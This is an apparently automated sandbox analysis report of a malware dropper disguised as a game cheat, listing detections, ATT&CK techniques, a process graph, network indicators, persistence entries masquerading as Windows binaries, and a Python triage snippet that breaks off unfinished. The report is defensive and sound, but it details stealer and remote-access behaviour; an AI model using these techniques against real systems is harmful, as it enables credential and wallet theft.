                        Source: Yara match | File source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Electrum
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Exodus
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Ethereum
                        Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                        Source: Yara matchFile source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Source: Yara match | File source: 0000002C.00000002.1947296388.0000000002774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.1947296388.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.1950988676.000000001256F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: portrefNet.exe PID: 7300, type: MEMORYSTR
Source: Yara match | File source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Lunch LaCheat.exe PID: 7972, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 52cheatand52rat.exe PID: 8100, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 12 Scripting | Valid Accounts | 111 Windows Management Instrumentation | 12 Scripting | 1 DLL Side-Loading | 21 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Bypass User Account Control | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 11 Process Injection | 21 Obfuscated Files or Information | Security Account Manager | 248 System Information Discovery | SMB/Windows Admin Shares | 1 Credential API Hooking | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 31 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 21 Software Packing | NTDS | 651 Security Software Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 31 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 161 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Bypass User Account Control | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 233 Masquerading | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Modify Registry | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 161 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 11 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet
Behavior Graph ID: 1545204 | Sample: FixTsDfhiC.exe | Startdate: 30/10/2024 | Architecture: WINDOWS | Score: 100 (node 2)
80 ip-api.com 2->80
94 Suricata IDS alerts for network traffic 2->94
96 Found malware configuration 2->96
98 Malicious sample detected (through community Yara rule) 2->98
100 19 other signatures 2->100
12 FixTsDfhiC.exe 3 2->12 started
76 C:\Users\user\AppData\...\Lunch LaCheatV2.exe, PE32 12->76 dropped
78 C:\Users\user\...\windows defender.bat, ASCII 12->78 dropped
130 Creates processes via WMI 12->130
16 Lunch LaCheatV2.exe 2 12->16 started
20 cmd.exe 1 12->20 started
58 C:\Users\user\AppData\...\Lunch LaCheat.exe, PE32 16->58 dropped
84 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 16->84
86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->86
88 Hides threads from debuggers 16->88
22 Lunch LaCheat.exe 3 16->22 started
90 Uses cmd line tools excessively to alter registry or file data 20->90
92 Uses schtasks.exe or at.exe to add and modify task schedules 20->92
26 reg.exe 1 1 20->26 started
28 reg.exe 1 1 20->28 started
30 reg.exe 1 1 20->30 started
32 28 other processes 20->32
72 C:\Users\user\AppData\...\DCRatBuild.exe, PE32 22->72 dropped
74 C:\Users\user\AppData\...\52cheatand52rat.exe, PE32 22->74 dropped
116 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 22->116
118 Found many strings related to Crypto-Wallets (likely being stolen) 22->118
120 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->120
122 Hides threads from debuggers 22->122
34 DCRatBuild.exe 3 7 22->34 started
38 52cheatand52rat.exe 14 3 22->38 started
124 Disables Windows Defender (deletes autostart) 26->124
126 Disable Windows Defender real time protection (registry) 26->126
60 C:\blockweb\portrefNet.exe, PE32 34->60 dropped
62 C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe, data 34->62 dropped
102 Antivirus detection for dropped file 34->102
104 Multi AV Scanner detection for dropped file 34->104
106 Machine Learning detection for dropped file 34->106
41 wscript.exe 1 34->41 started
44 wscript.exe 34->44 started
82 ip-api.com 208.95.112.1, 49731, 80 TUT-ASUS United States 38->82
46 WMIC.exe 38->46 started
128 Windows Scripting host queries suspicious COM object (likely to drop second stage) 41->128
48 cmd.exe 41->48 started
50 conhost.exe 46->50 started
52 portrefNet.exe 48->52 started
56 conhost.exe 48->56 started
64 C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe, PE32 52->64 dropped
66 C:\blockweb\WmiPrvSE.exe, PE32 52->66 dropped
68 C:\blockweb\RuntimeBroker.exe, PE32 52->68 dropped
70 13 other malicious files 52->70 dropped
108 Antivirus detection for dropped file 52->108
110 Multi AV Scanner detection for dropped file 52->110
112 Creates an undocumented autostart registry key 52->112
114 6 other signatures 52->114

Source | Detection | Scanner | Label | Link
FixTsDfhiC.exe | 92% | ReversingLabs | Win32.Trojan.Dorv
FixTsDfhiC.exe | 100% | Avira | TR/Crypt.XPACK.Gen
FixTsDfhiC.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\blockweb\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323984
C:\blockweb\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Windows\AppReadiness\dwm.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\Nu8jJRNGRr.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | 100% | Avira | HEUR/AGEN.1307507
C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 100% | Avira | VBS/Runner.VPG
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\Default\ApplicationFrameHost.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe | 100% | Avira | VBS/Runner.VPG
C:\blockweb\portrefNet.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Avira | HEUR/AGEN.1323984
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\blockweb\WmiPrvSE.exe | 100% | Joe Sandbox ML
C:\blockweb\RuntimeBroker.exe | 100% | Joe Sandbox ML
C:\Windows\AppReadiness\dwm.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\Users\Default\ApplicationFrameHost.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\blockweb\portrefNet.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Default\ApplicationFrameHost.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | 84% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | 83% | ReversingLabs | Win32.Trojan.Vindor
C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | 75% | ReversingLabs | Win32.Trojan.Vindor
C:\Users\user\Videos\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\AppReadiness\dwm.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\blockweb\RuntimeBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\blockweb\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\blockweb\portrefNet.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://crl.microsoft | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
http://ip-api.com | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://cp91897.tw1.ru/@=MzY2MWOkV2N | true | | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/Blank-c/Umbral-Stealer | 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | false | | unknown
https://discord.com/api/v10/users/ | 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | false | | unknown
http://crl.microsoft | 52cheatand52rat.exe, 00000024.00000002.1876249048.00000239D5E8B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD548000.00000004.00000800.00020000.00000000.sdmp, portrefNet.exe, 0000002C.00000002.1947296388.000000000279D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com/json/?fields=225545 | Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | false | | unknown
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | false | | unknown
https://discordapp.com/api/v9/users/ | Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | false | | unknown
http://ip-api.com | 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5CA000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5B6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545204
Start date and time: 2024-10-30 08:41:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: FixTsDfhiC.exe (renamed because original name is a hash value)
Original Sample Name: BBD6FFDB33259778F08704696A04891F.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@87/43@1/1
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 57%
• Number of executed functions: 170
• Number of non-executed functions: 94
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 216.58.206.35
• Excluded domains from analysis (whitelisted): vh436.timeweb.ru, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, cp91897.tw1.ru, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 52cheatand52rat.exe, PID 8100 because it is empty
• Execution Graph export aborted for target portrefNet.exe, PID 7300 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: FixTsDfhiC.exe
Time | Type | Description
03:42:17 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
03:42:19 | API Interceptor | 1x Sleep call for process: 52cheatand52rat.exe modified
07:42:26 | Task Scheduler | Run new task: ApplicationFrameHost path: "C:\Users\Default User\ApplicationFrameHost.exe"
07:42:26 | Task Scheduler | Run new task: ApplicationFrameHostA path: "C:\Users\Default User\ApplicationFrameHost.exe"
07:42:26 | Task Scheduler | Run new task: dwm path: "C:\Windows\AppReadiness\dwm.exe"
07:42:26 | Task Scheduler | Run new task: dwmd path: "C:\Windows\AppReadiness\dwm.exe"
07:42:26 | Task Scheduler | Run new task: RuntimeBroker path: "C:\blockweb\RuntimeBroker.exe"
07:42:26 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\blockweb\RuntimeBroker.exe"
07:42:26 | Task Scheduler | Run new task: ukzoUeHPfeDwGdTDRNL path: "C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe"
07:42:26 | Task Scheduler | Run new task: ukzoUeHPfeDwGdTDRNLu path: "C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe"
07:42:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL "C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe"
07:42:28 | Task Scheduler | Run new task: SgrmBroker path: "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"
07:42:28 | Task Scheduler | Run new task: SgrmBrokerS path: "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"
07:42:28 | Task Scheduler | Run new task: WmiPrvSE path: "C:\blockweb\WmiPrvSE.exe"
07:42:28 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\blockweb\WmiPrvSE.exe"
07:42:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\AppReadiness\dwm.exe"
07:42:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\Default User\ApplicationFrameHost.exe"
07:42:51 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\blockweb\RuntimeBroker.exe"
07:42:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\blockweb\WmiPrvSE.exe"
07:43:07 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"
07:43:15 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL "C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe"
07:43:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\AppReadiness\dwm.exe"
07:43:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\Default User\ApplicationFrameHost.exe"
07:43:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\blockweb\RuntimeBroker.exe"
07:43:48 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\blockweb\WmiPrvSE.exe"
07:43:56 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"
07:44:04 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL "C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe"
07:44:12 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\AppReadiness\dwm.exe"
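The timeline shows two persistence patterns worth pulling out of the raw rows: five Windows process names (dwm, RuntimeBroker, ApplicationFrameHost, SgrmBroker, WmiPrvSE) registered as scheduled tasks and as Run values under HKCU, HKCU64 and HKLM64, every one pointing outside the directory where the genuine binary lives, and every scheduled task created twice, the twin name being the original plus its own first character (dwm and dwmd, RuntimeBroker and RuntimeBrokerR). The Python below is an added triage example, not Joe Sandbox output: it parses rows in the form shown above and flags both patterns. The timeline rows are transcribed from the report; the table of genuine binary locations is an assumption supplied for the check.

```python
"""Triage of the Task Scheduler / Autostart rows in the sandbox timeline.

Added example, not Joe Sandbox output. SAMPLE_TIMELINE is transcribed from
the timeline above; SYSTEM_BINARY_DIRS (where the genuine Windows binaries
of these names live) is an assumption supplied for the check.
"""
import ntpath
import re
from dataclasses import dataclass

SAMPLE_TIMELINE = [
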